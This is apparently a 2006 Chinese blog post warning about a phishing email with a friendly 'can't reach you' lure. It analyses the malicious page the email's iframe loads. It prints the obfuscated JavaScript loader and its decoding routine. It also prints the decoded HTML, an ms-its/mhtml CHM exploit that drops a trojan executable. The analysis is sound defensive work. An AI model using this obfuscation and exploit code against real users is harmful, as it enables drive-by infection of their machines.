`
caobihole
  • 浏览: 941797 次
文章分类
社区版块
存档分类
最新评论

小心主题为:“最近好吗?怎么联系不上你”的带毒邮件

 
阅读更多

endurer 原创

2006-04-04 第1

今天收到一封带毒邮件。这封带毒邮件与2005年末收的的带毒邮件(可参考:收到带病毒的电子邮件.... )相似,但有所翻新。

主题:最近好吗?怎么联系不上你
发件人: "zxc338855" zxc338855@163.com
邮件内容为:
老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了 老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了

邮件体中其中用<IFRAME>引入了下载病毒的网页hxxp://2008.***e2.7868.net/service/bj/a.htm。


hxxp://2008.***e2.7868.net/service/bj/a.htm的内容为:


<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p","oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb","mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po","dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&","4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn","quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb","nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf","&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34","21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8","Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd","sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&","1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs","juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb","ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38","b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo","u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "];

function psw(st){
var varS;
varS="";
var i;
for(var a=0;a<st.length;a++){

i = st.charCodeAt(a);

if (i==1)

varS=varS+String.fromCharCode('"'.charCodeAt()-1);

else if (i==2) {

a++;

varS+=String.fromCharCode(st.charCodeAt(a));

}

else

varS+=String.fromCharCode(i-1);

}

return varS;

};

var num=16;

function S(){

for(i=0;i<num;i++)

document.write(psw(HtmlStrings[i]));}

S();

// -->

</SCRIPT>


用了一个自定义的加密函数来加密。

解密后的代码为:


<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>


unescape后的代码为:


<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>

<textarea id="code" style="display:none;">

<object data="ms-its:mhtml:file://c:/foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">

</object>

</textarea>

<script language="javascript">

document.write(code.value.replace(//${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));

</script>


该网页会下载、运行a.chm。

a.chm会释放/运行a.htm和a.exe,Kaspersky报为Exploit.HTML.CodeBaseExecTrojan-Dropper.Win32.Pakes,瑞星报为Exploit.HTML.CodeExecTrojan.PcGhost.c

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics